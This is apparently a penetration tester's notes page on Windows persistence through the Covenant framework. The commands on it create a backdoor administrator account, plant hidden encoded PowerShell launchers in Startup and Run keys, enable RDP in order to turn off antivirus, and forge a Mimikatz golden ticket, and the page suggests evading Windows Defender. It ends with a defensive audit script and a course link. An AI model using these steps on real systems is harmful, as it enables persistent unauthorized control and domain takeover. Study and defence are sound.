# Persistence

Here we assume we already have a shell with administrative privileges on the target.

## Create a new user

### Covenant

* Select Interact in your grunt
* Use `shellcmd net users username password /add` (Note: on a real engagement we need to choose a strong password and a recognizable username, such as the name of the company we work for, so the account can be identified and cleaned up afterwards)
* We can check that the user has been successfully added using `shell net users`
* Now we need to add our user to the local Administrators group using `shell net localgroup administrators username /add`

## Startup Persistence

### Covenant

* This method injects a payload into the user's startup tasks
* In your grunt, go to the Task tab and choose `PersistStartup` from the GruntTask list
* You should see this in the Payload input: `powershell -Sta -Nop -Window Hidden -EncodedCommand <blah>`. Replace `<blah>` with a PowerShell encoded launcher and click Task
* If we restart the target machine and log in again, we should get our shell back

***Note: Windows Defender is very efficient at detecting this, so you might have to try different approaches for AV evasion***

## Autorun Persistence

### Covenant

* Go to Launchers, select `Binary Launcher`, generate one and download it
* Go back to your high-integrity grunt and open the Task tab
* In the GruntTask list select `PersistAutorun` and choose the directory where the binary will be uploaded
* Go to the Interact tab, type Upload, put the directory in the file path and select the bin file you downloaded previously
* You can check that the bin was successfully added to the Registry using this command: `GetRegistryKey HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run`
* Once the machine restarts you should have a shell back

***Note: Windows Defender is very efficient at detecting this, so you might have to try different approaches for AV evasion***

## Persistence with RDP

* Start from an initial shell on the machine obtained with Covenant
* Enable Remote Desktop on the target: in the Interact tab we can type `powershell reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f; Enable-NetFirewallRule -DisplayGroup "Remote Desktop"`
* We could then connect to the target over RDP and disable the antivirus that way
* Disable Remote Desktop connections again: `powershell reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f; Disable-NetFirewallRule -DisplayGroup "Remote Desktop"`

## Golden Ticket Persistence

* Here we will use PowerShell along with powerview.ps1 and invoke-mimikatz.ps1
* `. .\powerview.ps1`
* `Get-DomainSID` gives us the domain SID; we will need to copy it
* `. .\invoke-mimikatz.ps1`
* `Invoke-Mimikatz -Command '"kerberos::golden /user:administrator /domain:domain.local /sid:PUT-THE-SID-HERE /krbtgt:PUT-HERE-TICKET-OF-DC-KRBTGT /ptt"'`
* We should now be a domain administrator with control of the domain controller, and we can promote a compromised user to Domain Admins
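As an added defender-side check (not part of the original notes, and not a Covenant feature), the following PowerShell script audits a host for the artifacts the techniques above leave behind: a newly created local administrator, entries in the `Run` keys, files in the Startup folders, and `fDenyTSConnections` together with the "Remote Desktop" firewall rule group. It assumes an elevated session on the host being audited; the regular expression for flagging encoded or hidden PowerShell launchers is a heuristic of my own.

```powershell
# Audit the persistence artifacts described on this page. Run elevated.
# Anything printed is a lead to review, not proof of compromise.

# Heuristic (assumption): command lines using encoded/hidden PowerShell, as in the Covenant launcher.
$suspicious = '(?i)-enc(odedcommand)?\b|-w(indow)?\s+hidden|-nop\b'

# 1. Local accounts and local Administrators membership ("net user ... /add").
#    Get-LocalUser has no creation date; PasswordLastSet is set at creation and is a usable proxy.
Write-Host '== Enabled local users, newest password first =='
Get-LocalUser | Where-Object Enabled | Sort-Object PasswordLastSet -Descending |
    Select-Object Name, PasswordLastSet, LastLogon | Format-Table -AutoSize
Write-Host '== Members of Administrators =='
Get-LocalGroupMember -Group 'Administrators' |
    Select-Object Name, ObjectClass, PrincipalSource | Format-Table -AutoSize

# 2. Run keys (PersistAutorun writes to the HKCU Run key; HKLM keys included for completeness).
Write-Host '== Run key entries =='
$runKeys = 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
           'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
           'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run'
$runKeys | Where-Object { Test-Path $_ } | ForEach-Object {
    $key = $_
    (Get-ItemProperty -Path $key).PSObject.Properties |
        Where-Object { $_.Name -notlike 'PS*' } |      # drop the provider's own PS* properties
        ForEach-Object {
            $cmd  = [string]$_.Value
            $flag = if ($cmd -match $suspicious) { 'ENCODED/HIDDEN' } else { '' }
            [pscustomobject]@{ Key = $key; Name = $_.Name; Command = $cmd; Flag = $flag }
        }
} | Format-Table -AutoSize -Wrap

# 3. Startup folders (PersistStartup drops its payload here).
Write-Host '== Startup folder contents =='
$startupDirs = [Environment]::GetFolderPath('Startup'), [Environment]::GetFolderPath('CommonStartup')
Get-ChildItem -Path $startupDirs -Force -File -ErrorAction SilentlyContinue |
    Select-Object FullName, LastWriteTime | Format-Table -AutoSize

# 4. Remote Desktop state: fDenyTSConnections = 0 means RDP is enabled.
Write-Host '== Remote Desktop state =='
$ts = Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server' -Name fDenyTSConnections
"fDenyTSConnections = $($ts.fDenyTSConnections)  (0 = RDP enabled, 1 = RDP disabled)"
Get-NetFirewallRule -DisplayGroup 'Remote Desktop' |
    Select-Object DisplayName, Enabled, Direction, Profile | Format-Table -AutoSize

# A golden ticket leaves nothing on the workstation to audit: it is investigated on the
# domain controllers' Kerberos logs, and remediation requires resetting krbtgt twice.
```

Compare the Run key and Startup folder listings against a known-good baseline of the host; the script only surfaces entries, it does not decide for you.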

## Resources

{% embed url="https://academy.tcm-sec.com/p/movement-pivoting-and-persistence-for-pentesters-and-ethical-hackers" %}
TCM Security Academy - Movement, Pivoting and Persistence for Pentesters and Ethical Hackers
{% endembed %}
